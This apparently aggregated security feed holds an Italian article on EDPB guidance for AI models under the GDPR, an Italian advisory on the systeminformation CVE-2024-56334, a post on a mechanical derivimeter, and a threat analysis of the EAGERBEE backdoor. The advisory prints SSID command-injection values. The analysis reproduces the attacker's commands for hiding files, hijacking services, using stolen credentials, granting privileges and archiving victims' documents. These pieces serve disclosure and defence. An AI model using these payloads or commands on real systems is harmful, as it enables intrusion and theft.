Una premessa importante: l’EDPB ha messo in chiaro che ciascuna valutazione deve riguardare la singola fattispecie, un approccio, quindi, “caso per caso”.
Con questa consapevolezza, analizziamo alcuni passaggi ed elementi che lo stesso EDPB ha posto in evidenza e che dovrebbero essere oggetto di valutazione.
Modello IA pubblico o interno?
La valutazione dei rischi potrà essere diversa a seconda che un modello di intelligenza artificiale sia pubblico e disponibile a una platea ampia o indeterminata di soggetti, piuttosto che sia un utilizzato solo internamente e a disposizione dei soli dipendenti.
Design del modello di IA:
Saranno valutati:
le misure adottate per evitare o limitare la raccolta dei dati personali.
Ciò comporta una valutazione di adeguatezza dei criteri di selezione e la pertinenza delle fonti scelte in relazione agli scopi previsti. Eventuale esclusione di fonti inappropriate;
la preparazione dei dati per la fase di formazione.
Ciò comporta una valutazione circa:
- l’aver considerato o meno l’utilizzo di dati anonimi o personali pseudonomizzati;
- qualora si sia deciso di non ricorrervi, tale scelta va motivata in relazione allo scopo perseguito. Pertanto è richiesto un onere di documentazione delle scelte;
- strategie e tecniche di minimizzazione dei dati, utilizzate al fine di limitare il volume dei dati personali nel processo di formazione;
- esistenza di eventuali processi di filtraggio dei dati prima dell’addestramento, finalizzati a escludere dati personali irrilevanti.
i metodi scelti per lo sviluppo di modelli di intelligenza artificiale.
Le metodologie scelte per lo sviluppo e l’addestramento del modello devono essere robuste e adeguate per eliminare o ridurre in modo significativo l’identificabilità dei dati. Tra le valutazioni rientrano: l’utilizzo di metodi per il miglioramento dell’applicazione generale del modello e ridurre il rischio di overfitting (rischi che il modello si adegui ai dati propri del data set ma non sia in grado di adattarsi a dati nuovi) e l’adozione, da parte del titolare del trattamento, di adeguate politiche privacy
tecniche adottate per ridurre il rischio che il modello di I.A. fornisca dati personali in risposta alle queries.
Analisi del modello di AI
I titolari del trattamento devono condurre audit, anche documentali, finalizzati alla valutazione delle misure adottate e del loro impatto in relazione alla limitazione delle probabilità di identificazione.
Tra le analisi documentali potrebbero rientrare l’analisi delle relazioni sulle revisioni dei codici.
Queste operazioni sono necessarie poiché è necessario che il progetto sia stato effettivamente sviluppato come previsto.
Resistenza del modello agli attacchi
A tal proposito saranno oggetto di valutazione la portata, la frequenza, la quantità e la qualità dei test condotti sul modello. Al momento, tra gli altri, sono attesi test strutturati contro la possibilità di inferenza di attributi; l’esfiltrazione; il rigurgito dei dati di addestramento; l’inversione del modello, o la ricostruzione.
Documentazione
Tra i controlli che saranno svolti vi sono quelli documentali. Avere una documentazione completa e adeguata è rilevante poiché l’EDPB ha fornito una indicazione chiara: se l’Autorità di controllo non riesce ad avere la certezza dell’anonimizzazione del dato, allora il modello di AI ha fallito la conformità a questo aspetto. Poiché la prova è in capo al titolare, se l’Autorità ha ancora dei dubbi, allora la prova non è sufficiente.
Tra i documenti da fornire:
- qualsiasi informazione relativa alle DPIA. In caso non sia stata svolta devono essere fornite le valutazione e le decisioni che ne hanno stabilito la non necessarietà;
- qualsiasi consiglio o feedback fornito dal Responsabile della protezione dei dati (“DPO”), se esistente e nominato. Importante quindi conservare anche le interlocuzione avute con il DPO;
- informazioni sulle misure tecniche e organizzative adottate durante l’elaborazione del modello di IA per ridurre la probabilità di identificazione, compresi il modello di minaccia e le valutazioni dei rischi su cui si basano tali misure.
Le misure vanno valutate in relazione allo specifico set di dati di addestramento, sia quelle adottate dal Titolare sia quelle già eventualmente adottate dal fornitore di set di dati;
- le misure tecniche e organizzative adottate in tutte le fasi del ciclo di vita del modello, che hanno contribuito o verificato l’assenza di dati personali nel modello;
- la documentazione che dimostra la resistenza teorica del modello di IA alle tecniche di re-identificazione, nonché i controlli progettati per limitare o valutare il successo e l’impatto degli attacchi principali (rigurgito, attacchi di inferenza, esfiltrazione, ecc.).
Tra questa documentazione troviamo, in particolare: il rapporto tra la quantità di dati di addestramento e il numero di parametri nel modello, compresa l’analisi del suo impatto sul modello; metriche sulla probabilità di reidentificazione sulla base dello stato dell’arte attuale; le relazioni sulle modalità di verifica del modello (da chi, quando, come e in che misura) e i risultati delle verifiche;
- la documentazione fornita al/ai titolare/i del trattamento e/o agli interessati, in particolare la documentazione relativa alle misure adottate per ridurre la probabilità di identificazione e relativa ai possibili rischi residui.
- Utilizzo dei dati per il modello di I.A. Quale base giuridica?
In relazione all’utilizzo dell’Interesse legittimo del Titolare del trattamento (art. 6 l. f) GDPR) quale base giuridica per il trattamento dei dati, l’EDPB propone alcune considerazione che, di fatto, richiamano i principi già esposti nel suo parere 01/2024.
Pertanto è necessario verificare che siano state soddisfatte tutte le seguenti condizioni:
- il perseguimento di interessi legittimi del titolare o di terze parti,
- il trattamento è necessario per il perseguimento dell’interesse
- all’esito dell’operazione di bilanciamento, il legittimo interesse del titolare non deve essere soccombente rispetto ai diritti degli interessati.
Interesse legittimo: deve essere legale, chiaro e precisamente articolato, deve essere reale, presente e non speculativo.
Trattamento necessario: se consente di raggiungere l’interesse perseguito e se non esistono altri trattamenti meno invasivi per il raggiungimento del medesimo interesse.
Test di bilanciamento: in relazione ai modelli di I.A. la valutazione di bilanciamento è particolarmente complessa poiché questi strumenti sono molto invasivi dei diritti degli interessati.
In particolare, nella fase di sviluppo potrebbero entrare in gioco gli interessi all’autodeterminazione dell’individuo e il controllo sui suoi dati personali.
Nella fase di implementazione del modelli potrebbero essere intaccati gli interessi al mantenimento del controllo dei propri dati personali, gli interessi finanziari, i benefici personali o gli interessi socio-economici, ecc.
Inoltre la raccolta massiva, anche attraverso web-scraping, di dati personali, potrebbe aumentare la percezione di controllo da parte degli individui che, conseguentemente, potrebbero giungere ad azioni di “auto-censura”.
Ulteriore aspetto da valutare è l’impatto del trattamento dei dati personali, questo può dipendere dalla natura dei dati trattati, dal contesto del trattamento e dalle sue conseguenze.
Le valutazioni, inoltre, saranno diverse a seconda che i dati personali siano contenuti nel data set di allenamento, oppure che siano il risultato di output del completo sistema di A.I.
Altre misure che saranno oggetto di analisi riguardano le misure di sicurezza adottate per evitare un utilizzo dannoso del modello A.I.
Particolarmente interessante è l’aspetto riguardante le ragionevoli aspettative degli interessati. Cioè se questi, al momento in cui hanno fornito i propri dati, anche in relazione al contesto, potessero aspettarsi che questi fossero utilizzati per l’addestramento di modelli di I.A. A questo fine è importante fare riferimento agli elementi indicati nelle già citate linee guida EDPB(01/2024).
Oltre a ciò è importante considerare il contesto più ampio del trattamento, ad esempio il fatto che i dati personali fossero o meno disponibili pubblicamente, la natura del rapporto tra l’interessato e il titolare del trattamento, la natura del servizio, il contesto in cui i dati personali sono stati raccolti, la fonte da cui sono stati raccolti, le possibilità di ulteriori utilizzi del modello e se gli interessati sono effettivamente consapevoli del fatto che i loro dati personali sono online.
Misure di mitigazione
Sono strumenti volti a fare in modo che i diritti degli interessati e di terze parti non prevalgano sull’interesse del titolare. Tali misure dovranno essere adattate alle circostanze del caso specifico e potranno dipendere da diversi fattori, non ultimo l’utilizzo a cui è destinato lo strumento di A.I.
In relazione alla fase di sviluppo del modello, sono diverse le misure tecniche che possono essere adottate:
- misure già viste per la valutazione delle tecniche di anonimizzazione del modello (design e analisi del modello, resistenza agli attacchi, documentazione) quando queste misure non siano necessarie per adempiere ad altri obblighi del GDPR;
- misure di pseudonimizzazione, vi rientrano strumenti volti a evitare qualsiasi combinazione di dati basata su identificatori individuali. L’EDPB mette in guardia sul fatto che tali misure potrebbero essere valutate inadeguate se l’Autorità di controllo ritenesse che il Titolare abbia necessità di raccogliere dati diversi su un determinato individuo per lo sviluppo del sistema o del modello di A.I.;
- misure per mascherare i dati personali o sostituirli con dati falsi nel data set di addestramento. Questa misura potrebbe essere particolarmente opportuna nei modelli, ad esempio, di LLM (Large Language Model) e altri in cui l’elaborazione dell’informazione non è determinante per il trattamento complessivo e potrebbe, quindi, rivelarsi superflua;
Misure per facilitare l’esercizio dei diritti degli interessati:
- Osservare un periodo ragionevole, a seconda dei casi, tra la raccolta dei dati e il loro utilizzo, così che gli interessati possano utilizzare tale periodo per esercitare i loro diritti;
- Fornire un incondizionato diritto di opposizione o di opt-out sin dall’inizio, al fine di dare all’interessato la possibilità di controllo sui propri dati, anche oltre le aspettative e le indicazioni dell’art. 21 GDPR;
- Garantire il diritto di cancellazione dei dati agli interessati anche quando non ricorrono i motivi specifici previsti dall’art. 17 GDPR;
- Fornire la possibilità agli interessati di presentare reclami di diversa natura e impostare tecniche che consentano al controllore di applicare meccanismi di “disapprendimento” del modello.
Misure di trasparenza:
Alcune tecniche, oltre a quelle previste dal GDPR, possono aiutare a compensare l’asimmetria informativa consentendo agli interessati una maggiore comprensione su come i propri dati sono utilizzati.
- Diffusione di informazioni pubbliche, che vanno oltre gli schemi degli art. 13 e 14 GDPR, sui criteri di raccolta dei dati e sulle serie di dati utilizzati, con particolare riguardo ai soggetti vulnerabili;
- Forme alternative di diffusione attraverso campagne mediatiche, via mail, visualizzazione grafica e schede modello, oltreché una relazione annuale volontaria sulla trasparenza;
Da queste misure suggerite si vede come lo stesso EDPB inviti ad andare oltre il dettato del GDPR che potrebbe non essere più sufficiente di fronte ai nuovi rischi introdotti dall’Intelligenza Artificiale.
Specifiche misure di mitigazione per il web scraping
Il web scraping è quella modalità di raccolta che consente di estrarre dati dalle pagine web e di raccoglierli in data base.
Questa modalità di raccolta, che significa letteralmente “raschiare il web”, è una forma di raccolta di dati simile ad una “pesca a strascico”. Per questa sua peculiarità, questa modalità di estrazione dati presenta rischi specifici, tanto che le Autorità di controllo per la protezione dei dati personali, nei mesi scorsi adottavano linee guida congiunte.
L’EDPB, nel documento in analisi, individua alcune misure di sicurezza specifiche per i rischi legati a questa modalità di raccolta dati. Queste misure sono aggiuntive, oltre a quelle già individuate nelle pagine precedenti.
- Non pubblicare dati che potrebbero comportare rischi per determinate persone o gruppi di persone;
- garantire che determinate categorie di dati non siano raccolte o che determinate fonti siano escluse dalla raccolta dei dati. Potrebbe riguardare, ad esempio, siti web che siano particolarmente rischiosi a causa della sensibilità dell’argomento trattato;
- non procedere alla raccolta di quei dati contenuti in siti web che si oppongono chiaramente al web scraping e al riutilizzo dei loro contenuti per creare database per l’addestramento di IA;
- imporre altri limiti pertinenti alla raccolta, eventualmente includendo criteri basati su periodi di tempo;
- creazione di una lista di opt-out, gestita dal titolare del trattamento, che consente agli interessati di opporsi alla raccolta dei loro dati su determinati siti web o piattaforme online.
Ulteriori misure di sicurezza individuate dall’EDPB:
- misure tecniche per impedire la conservazione, il rigurgito o la generazione di dati personali, in particolare nel contesto di modelli di IA generativa (come i filtri di output), e/o per attenuare il rischio di riutilizzo illecito da parte di modelli di IA di uso generale (ad esempio la filigrana digitale dei risultati generati dall’IA);
- misure che facilitano o accelerano l’esercizio dei diritti delle persone fisiche nella fase di diffusione, al di là di quanto richiesto dalla legge, riguardanti in particolare, e non solo, l’esercizio del diritto alla cancellazione dei dati personali dai dati di output del modello o dalla deduplicazione, e le tecniche post-addestramento che tentano di rimuovere o sopprimere i dati personali.
Conseguenze di un utilizzo illegittimo dei dati
In caso di violazione le Autorità di controllo possono imporre l’adozione di misure correttive tra cui l’emissione di una sanzione pecuniaria, l’imposizione di una limitazione temporanea del trattamento, la cancellazione di una parte dell’insieme di dati che è stata trattata illecitamente. Qualora non sia possibile, considerando il principio di proporzionalità, l’Autorità potrebbe giungere a imporre la cancellazione dell’intero insieme di dati utilizzato per lo sviluppo del modello I.A. o del modello stesso.
La misura sarà ritenuta proporzionata se non vi sono altre misure adeguatamente utilizzabili dal titolare (es. la riqualificazione).
Conclusioni
Lo sviluppo di modelli I.A. necessita di utilizzare dati in grandi quantità, pertanto il ruolo svolto dal GDPR e dalle Autorità di controllo è determinante, così come le attenzioni che gli sviluppatori e gli utilizzatori dei modelli dovranno riservare a questi aspetti.
L’esecuzione di una DPIA prima dell’adozione del modello I.A. appare francamente inevitabile, a questo fine è necessario conoscere le procedure tecniche e soprattutto avere a disposizione la documentazione relativa al modello e alle modalità di sviluppo e addestramento.
L’A.I. Act non sarà efficace ancora per diverso tempo, ma il GDPR fornisce delle regole attuali e cogenti il cui rispetto, non solo è un obbligo normativo, ma costituisce anche una sorta di framework per una corretta e adeguata gestione dei modelli di I.A. nel rispetto dei diritti.
L'articolo Come l’Europa sta riscrivendo le regole per l’intelligenza artificiale: tutto quello che devi sapere proviene da il blog della sicurezza informatica.
djpanini likes this.
Come l’Europa sta riscrivendo le regole per l’intelligenza artificiale: tutto quello che devi sapere
redhotcyber.com/post/come-leur…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness #cybersecuritytraining #cybersecuritynews #infosecurity
Come l'Europa sta riscrivendo le regole per l'intelligenza artificiale: tutto quello che devi sapere
Scopri come implementare correttamente l'Intelligenza Artificiale rispettando la normativa GDPR. Analizziamo le linee guida EDPB, i rischi legati all'anonimizzazione dei dati e i requisiti di conformità per modelli di AI basati su dati personali.Andrea Capelli (Red Hot Cyber)
reshared this
SSID dannosi sfruttano bug in systeminformation: aggiornare subito per evitare RCE
È stata scoperta una vulnerabilità critica in un popolare pacchetto npm chiamato systeminformation che mette a rischio milioni di sistemi Windows aprendo la possibilità di esecuzione di codice remoto (RCE) e di escalation dei privilegi. Il problema, identificato come CVE-2024-56334, evidenzia l’importanza di una programmazione sicura quando si tratta di dati utente non attendibili.github.com/sebhildebrandt/syst…securitylab.ru/glossary/Window…securitylab.ru/glossary/rce/nvd.nist.gov/vuln/detail/CVE-2…
La vulnerabilità colpisce la funzione getWindowsIEEE8021x nelle versioni del pacchetto systeminformation ≤5.23.6. Il problema è causato da una convalida insufficiente dei dati del campo SSID Wi-Fi passati direttamente alla riga di comando di Windows (cmd.exe). Ciò apre la strada all’iniezione di comandi dannosi che vengono eseguiti a livello del sistema operativo.
Secondo i dati di GitHub, l’SSID viene trasmesso tramite i comandi “netsh wlan show Interface” e cmd.exe /d /s /c “netsh wlan show profiles” senza un’adeguata verifica. Gli aggressori possono creare SSID speciali contenenti codice dannoso per ottenere il controllo completo sul sistema della vittima.
Un esempio della vulnerabilità mostra come un utente malintenzionato potrebbe configurare un punto di accesso con un SSID che include comandi come
- a” | ping /t 127.0.0.1
- a” | %SystemDrive%\a\a.exe &
Un utente connesso a una rete di questo tipo corre il rischio di eseguire operazioni dannose.
La vulnerabilità è stata scoperta dal ricercatore @xAiluros, che ha anche fornito una prova di concetto e una descrizione del problema. I rischi potenziali includono l’esecuzione di codice in modalità remota, l’accesso non autorizzato ai dati e l’interruzione del sistema. Il punteggio di base CVSS v3 per questa vulnerabilità è 7,8, che ne indica la criticità.
Per eliminare la vulnerabilità, lo sviluppatore del pacchetto ha rilasciato l’aggiornamento 5.23.7, che ha introdotto il controllo e la pulizia dei dati di input. Si consiglia vivamente a tutti gli sviluppatori che utilizzano questo pacchetto di aggiornare i propri progetti per prevenire attacchi.
L'articolo SSID dannosi sfruttano bug in systeminformation: aggiornare subito per evitare RCE proviene da il blog della sicurezza informatica.
SSID dannosi sfruttano bug in systeminformation: aggiornare subito per evitare RCE
redhotcyber.com/post/ssid-dann…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness #cybersecuritytraining #cybersecuritynews #infosecurity
SSID dannosi sfruttano bug in systeminformation: aggiornare subito per evitare RCE
Scoperta vulnerabilità CVE-2024-56334 in systeminformation: milioni di sistemi Windows esposti a RCE e escalation dei privilegi. Aggiorna subito alla versione 5.23.7.Redazione RHC (Red Hot Cyber)
reshared this
Mechanical Calculator Finds Derivitives
We like mechanical calculators like slide rules, but we have to admit that we had not heard of the Ott Derivimeter that [Chris Staecker] shows us in a recent video. As the name implies, the derivimeter finds the derivative of a function. To do that, you have to plot the function on a piece of paper that the meter can measure.
If you forgot calculus or skipped it altogether, the derivative is the rate of change. If you plot, say, your car’s speed vs time, the parts where you accelerate or decelerate will have a larger derivative (either positive or negative, in the decelerate case). If you hold a steady speed, the derivative will be zero.
To use the derivimeter, you sight the curve through the center glass and twist the device so the cursor, which is a lens and mirror system that lets you precisely find a tangent line. You can read the angle and find the true derivative using a table of tangents.
[Chris] has another derivimeter from Gerber. However, he found a different type of derivimeter that uses a prism, and he sure would like to find one of those for his collection.
Calculus is actually useful and not as hard as people think if you get the right explanations. This isn’t exactly a slide rule, but since it is a mechanical math device, we think it counts anyway.
youtube.com/embed/w4Wdjz2uiPY?…
EAGERBEE, with updated and novel components, targets the Middle East
Introduction
In our recent investigation into the EAGERBEE backdoor, we found that it was being deployed at ISPs and governmental entities in the Middle East. Our analysis uncovered new components used in these attacks, including a novel service injector designed to inject the backdoor into a running service. Additionally, we discovered previously undocumented components (plugins) deployed after the backdoor’s installation. These enabled a range of malicious activities such as deploying additional payloads, exploring file systems, executing command shells and more. The key plugins can be categorized in terms of their functionality into the following groups: Plugin Orchestrator, File System Manipulation, Remote Access Manager, Process Exploration, Network Connection Listing and Service Management.
In this blog, we provide a detailed analysis of the EAGERBEE backdoor’s capabilities, focusing on the service injector, Plugin Orchestrator module and associated plugins. We also explore potential connections of the EAGERBEE backdoor with the CoughingDown threat group.
Initial infection and spread
Unfortunately, the initial access vector used by the attackers remains unclear. However, we observed them executing commands to deploy the backdoor injector named “tsvipsrv.dll” along with the payload file ntusers0.dat, using the SessionEnv service to run the injector, as can be seen below.
//change the creation, last access and write time, timestamp of the file to "1/8/2019 9:57"
attrib.exe -s -h -a C:\users\public\ntusers0.dat
powershell.exe -Command "='1/8/2019 9:57'; = 'C:\users\public\ntusers0.dat';(Get-Item
).creationtime = ;(Get-Item ).lastaccesstime = ;(Get-Item ).lastwritetime = "
//set the attributes of the file (EAGERBEE backdoor) to archive (+a), system file (+s) and
//hidden (+h)
attrib.exe +s +h +a C:\users\public\ntusers0.dat
//set the attributes of the file (loader) to archive (+a), system file (+s) and hidden
//(+h)
attrib.exe +s +h +a system32\tsvipsrv.dll
//the malware runs now because of a DLL hijacking vulnerability, as the libraries in the
//system32 directory where the malicious library is located are the first to load
net.exe stop sessionenv
cmd.exe /c "sc config sessionenv Start= auto"
net.exe start sessionenv
attrib.exe -s -h -a C:\users\public\ntusers0.dat
net.exe use \\<<internal ip>>\c$ <password> /user:<username>
attrib.exe +s +h +a C:\users\public\ntusers0.dat
attrib.exe +s +h +a \\172.17.1.127\c$\users\public\ntusers0.dat
attrib.exe -s -h -a system32\tsvipsrv.dll
attrib.exe +s +h +a system32\tsvipsrv.dll
attrib.exe +s +h +a \\172.17.1.127\c$\windows\system32\tsvipsrv.dll
attrib.exe -s -h -a \\172.17.1.127\c$\windows\system32\tsvipsrv.dll
attrib.exe +s +h +a \\172.17.1.127\c$\windows\system32\
Malware components
Service injector
The service injector targets the Themes service process. It first locates and opens the process, then allocates memory within it to write EAGERBEE backdoor bytes (stored in C:\users\public\ntusers0.dat) along with stub code bytes. The stub code is responsible for decompressing the backdoor bytes and injecting them into the service process memory.
To execute the stub code, the injector replaces the original service control handler with the address of the stub code in the service process memory. The stub is then triggered by sending a SERVICE_CONTROL_INTERROGATE control code to the service. After the stub completes its execution, the injector cleans up by removing the stub code from the service memory and restoring the original service control handler.
EAGERBEE backdoor
When we found the backdoor in the infected system, it was named
dllloader1x64.dll. It can create a mutex with the name mstoolFtip32W if one doesn’t exist yet. After that, it starts collecting information from the system: the NetBIOS name of the local computer, OS information (major and minor version numbers, build number, platform identifier, and information about product suites and the latest service pack installed on the system), product type for the operating system on the local computer, processor architecture, and list of IPv4 and IPv6 addresses.
The backdoor has an execution day and time check. It compares the current system day and hour to the hardcoded string
0-6:00:23;6:00:23;, where the numbers mean the following:
- 0: start day of the week;
- 6: end day of the week;
- 00: start hour;
- 23: end hour.
If the execution day and hour do not match, it sleeps for 15 seconds and checks again. In the cases we’ve seen, the backdoor is configured to run 24/7.
The backdoor configuration is either stored in C:\Users\Public\iconcache.mui or hardcoded within the binary. If stored in the file, the first byte serves as the XOR key to decode the remaining data. When hardcoded, the configuration is decoded using a single-byte XOR key (0x57). This configuration includes the command-and-control (C2) hostname and port.
The backdoor retrieves the proxy host and port information for the current user by reading the registry key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer. If proxy details are available, the backdoor connects through the proxy; otherwise it connects to the C2 server directly.
To establish communication, the backdoor creates a TCP socket capable of operating over both IPv4 and IPv6. If the C2 port has an “s” appended, an SSL session is initiated. Depending on the configuration, it may use the SCHANNEL security package, which supports SSL and TLS encryption on Windows. In this mode, it can validate server credentials (passive mode) or use local client credentials to prepare an outgoing token (active mode).
Once a connection is established, the backdoor transmits the previously collected victim-specific details to the C2 server. The server responds with a string followed by a payload known as the Plugin Orchestrator. If the response string matches a hardcoded value in the backdoor (unique to each sample), the backdoor retrieves the raw address of the first export method in the received payload and invokes it. Notably, at this stage, the payload (Plugin Orchestrator) is not yet mapped into memory.
Plugin Orchestrator
The payload downloaded by the EAGERBEE backdoor is a plugin orchestrator in the form of a DLL file with the internal name “ssss.dll” which exports a single method: “m”. As previously mentioned, EAGERBEE does not map the plugin orchestrator DLL directly into memory. Instead, it retrieves the raw address of the “m” export method and invokes it.
The “m” method of the plugin orchestrator DLL is responsible for injecting the orchestrator into memory and subsequently calling its entry point. In addition to the victim-specific data already collected, the plugin orchestrator gathers and reports to the C2 server the following additional information:
- The NetBIOS name of the domain;
- Current usage of physical and virtual memory;
- System locale and time zone settings;
- Windows character encoding;
- The current process identifier;
- Identifiers for any loaded plugins.
After transmitting this information, the plugin orchestrator also reports whether the current process has elevated privileges. It then collects details about all running processes on the system, including:
- Process identifiers;
- The number of execution threads started by each process;
- The identifier of the parent process;
- The fully qualified path of each process executable.
Once the information is sent, the plugin orchestrator waits for commands to execute. The following commands are supported:
Command | Description |
06 | This command supports several sub-commands: 2: Receive and inject plugins into memory. There can be multiple plugins loaded one after another. Each plugin has an identifier. 3: Unload a specific plugin from memory, remove the plugin from the list, and free the plugin code bytes. 4: No operation. 5: Remove all plugins from the list and free the plugin code bytes. |
07 and 09 | Check if the plugin is loaded or not. If the plugin is loaded, then call the specified export method of the plugin. If the plugin is not loaded, then check if the plugin has been received, then load it, and call the specified export method. Otherwise, just make a plugin entry. |
Plugins
The plugins are DLL files and export three methods using ordinals. The plugin orchestrator first calls the exported method of the plugin with the ordinal number 3. This method is responsible for injecting the plugin DLL into memory. After that, the orchestrator calls the exported method of the plugin with the ordinal number 1, which is the
DllMain method. This method initializes the plugin with the required data structures. Finally, it calls the exported method of the plugin with the ordinal number 2. This method implements the functionality of the plugin.
All the plugins are responsible for receiving and executing commands from the orchestrator. Below, we provide brief descriptions of the analyzed plugins and the commands supported by each of them.
File Manager Plugin
This plugin performs a wide range of file system functions, including:
- Listing drives, files and folders in the system;
- Renaming, moving, copying and deleting files;
- Setting ACLs to manage file and folder permissions;
- Reading and writing files to and from the system;
- Injecting additional payloads into memory.
The table below contains commands it accepts.
Command | Description |
0x02 |
|
0x06 |
|
0x07 |
|
0x08 |
|
0x09 |
|
0x0A (10) |
|
0x0B (11) |
|
0x0C (12) |
|
0xD (13) |
|
0x0F (15) |
|
0x14 (20) |
|
0x22 (34) |
|
0x23 (35) |
|
0x24 (36) |
|
0x26 (38) |
|
Process Manager
This plugin manages process-related activities such as:
- Listing running processes in the system;
- Launching new modules and executing command lines;
- Terminating existing processes.
It accepts four commands.
Command | Description |
0x10 (16) |
|
0x11 (17) |
|
0x1E (30) |
|
0x26 (38) |
|
Remote Access Manager
This plugin facilitates and maintains remote connections, while also providing command shell access.
Command | Description |
0x0B (11) |
|
0x0D (13) |
|
0x1D (29) |
|
0x1E (30) |
|
0x21 (33) |
|
The attackers launch the command shell by injecting
cmd.exe into the DllHost.exe process. The commands below were seen executed by the threat actor://list all users and users in the local admin group
net user
net localgroup administrators
//obtain system- and account-related information; the "dsquery" command implies that the
//attacker got hold of a Windows server machine with the Active Directory Domain Services
//(AD DS) server role installed.
dsquery computer
dsquery server
dsquery users
dsquery user
systeminfo
ping -n 1 <<computer name>>
//establish a connection to a shared resource using stolen credentials
net use \\<<ip in the network>>\admin$ <password> /user:<username>
//archive the information from the shared resource
rar.exe a -v100M idata001.rar -ta"20240101000000" -r -x"*.mp3" -x"*.dll" -x"*.exe" -
x"*.zip" -x"*.mxf" -x"*.rar" "\\<<ip in the network>>\c$\Users\<<user name>>\Documents"
"\\<<ip in the network>>\c$\Users\<<user name>>\Desktop"
rar.exe a -v100M idata001.rar -ta"20240101000000" -r -x"*.mp3" -x"*.dll" -x"*.exe" -
x"*.zip" -x"*.mp4" -x"*.rar" "\\<<ip in the network>>\c$\Users\<<user name>>\Documents"
"<<ip in the network>>\c$\Users\<<user name>>\Desktop"
Service Manager
This plugin manages system services, including installing, starting, stopping, deleting and listing them.
Command | Description |
0x11 (17) |
|
0x12 (18) |
|
0x13 (19) |
|
0x14 (20) |
|
0x1E (30) |
|
Network Manager
This plugin lists the network connections in the system.
Command | Description |
0x1E (30) | Get information about the list of IPv4 and IPv6 TCP and UDP connections:
|
Attribution
EAGERBEE was deployed in several organizations in East Asia. Two of these organizations were breached via the infamous ProxyLogon vulnerability (CVE-2021-26855) in Exchange servers, after which malicious webshells were uploaded and utilized to execute commands on the breached servers.
In May 2023, our telemetry indicated the execution of multiple commands to start and stop system services at one of the affected organizations in East Asia. The attackers abused the legitimate Windows services
MSDTC, IKEEXT and SessionEnv to execute malicious DLLs: oci.dll, wlbsctrl.dll and TSVIPSrv.dll, respectively.tasklist.exe
net stop IKEEXT
net start IKEEXT
net start msdtc
net stop msdtc
net start msdtc
NETSTAT.EXE -ano
tasklist.exe
ARP.EXE -a
net.exe use \\[[IP REDACTED]]\admin$
ipconfig.exe /all
net.exe stop IKEEXT
//all privileges are assigned to the service IKEEXT, which loads the malicious DLL
reg.exe add hklm\SYSTEM\CurrentControlSet\Services\IKEEXT /v RequiredPrivileges /t
REG_MULTI_SZ /d
SeAuditPrivilege\0SeBackupPrivilege\0SeRestorePrivilege\0SeTakeOwnershipPrivilege\0SeImper
sonatePrivilege\0SeTcbPrivilege\0SeAssignPrimaryTokenPrivilege\0SeManageVolumePrivilege\0S
eCreateSymbolicLinkPrivilege\0SeShutdownPrivilege /f
net.exe start IKEEXT
net.exe start IKEEXT
NETSTAT.EXE -ano
net.exe view
net.exe stop IKEEXT
net.exe start IKEEXT
net.exe start IKEEXT
net.exe start sessionenv
net.exe stop sessionenv
net.exe stop SessionEnv
net.exe start SessionEnv
net.exe start SessionEnv
net.exe start SessionEnv
net.exe start SessionEnv
net.exe start SessionEnv
net.exe stop SessionEnv
net.exe stop SessionEnv
According to our telemetry, the DLLs loaded and executed by the services
IKEEXT and SessionEnv are loaders in nature, loading the EAGERBEE backdoor into memory. Similar EAGERBEE loaders targeting Japanese organizations have been described by another security vendor. Examples of files loaded by these services are provided below.
IKEEXT
MD5 | File Name | Compilation Time | EAGERBEE Payload File |
5633cf714bfa4559c97fc31 3650f86dd | wlbsctrl.dll | Monday, 23.05.2022 14:02:39 UTC) | C:\Users\Public\Videos\< name>.mui |
3ccd5827b59ecd0043c112c 3aafb7b4b | wlbsctrl.dll | Sunday, 01.01.2023 20:58:58 UTC | %tmp%\*g.logs |
SessionEnv
MD5 | File Name | Compilation Time | EAGERBEE Payload File |
67565f5a0ee1deffe0f3688 60be78e1e | TSVIPSrv.dll | Wednesday, 25.05.2022 15:38:06 UTC | C:\Users\Public\Videos\< name>.mui |
00d19ab7eed9a0ebcaab2c4 669bd34c2 | TSVIPSrv.dll | Sunday, 01.01.2023 20:50:01 | %tmp%\*g.logs |
The service MSDTC loaded and executed a DLL file named “
oci.dll”. By analyzing this file, we established that it was the CoughingDown Core Module.
MD5 | File Name | Compilation Time | Description |
f96a47747205bf25511ad96 c382b09e8 | oci.dll | Thursday, 24.02.2022 05:18:05 UTC | CoughingDown Core Module |
We found several clues linking the EAGERBEE backdoor to the CoughingDown group:
- One of the aforementioned DLLs, oci.dll (MD5 f96a47747205bf25511ad96c382b09e8), which is executed by abusing the legitimate MSDTC service, has a 25% match with CoughingDown samples according to the Kaspersky Threat Attribution Engine (KTAE). Analysis of the DLL reveals that it is a Core Module of multi-plugin malware developed by CoughingDown in late September 2020 and that there is indeed a significant code overlap (same RC4 key, same command numbers).
- This Core Module was configured to use the IP addresses 45.90.58[.]103 and 185.82.217[.]164 as its C2. The IP address 185.82.217[.]164 is known to be used as an EAGERBEE C2 as reported by other security vendors.
Conclusions
Malware frameworks continue to advance as threat actors develop increasingly sophisticated tools for malicious activities. Among these is EAGERBEE, a malware framework primarily designed to operate in memory. This memory-resident architecture enhances its stealth capabilities, helping it evade detection by traditional endpoint security solutions. EAGERBEE also obscures its command shell activities by injecting malicious code into legitimate processes, such as dllhost.exe, and executing it within the context of explorer.exe or the targeted user’s session. These tactics allow the malware to seamlessly integrate with normal system operations, making it significantly more challenging to identify and analyze.
In the East Asian EAGERBEE attacks, the organizations were penetrated via the ProxyLogon vulnerability. ProxyLogon remains a popular exploit method among attackers to gain unauthorized access to Exchange servers. Promptly patching this vulnerability is crucial to securing your network perimeter.
Because of the consistent creation of services on the same day via the same webshell to execute the EAGERBEE backdoor and the CoughingDown Core Module, and the C2 domain overlap between the EAGERBEE backdoor and the CoughingDown Core Module, we assess with medium confidence that the EAGERBEE backdoor is related to the CoughingDown threat group.
However, we have been unable to determine the initial infection vector or identify the group responsible for deploying the EAGERBEE backdoor in the Middle East.
IOC
Service Injector
183f73306c2d1c7266a06247cedd3ee2
EAGERBEE backdoor compressed file
9d93528e05762875cf2d160f15554f44
EAGERBEE backdoor decompress
c651412abdc9cf3105dfbafe54766c44
EAGERBEE backdoor decompress and fix
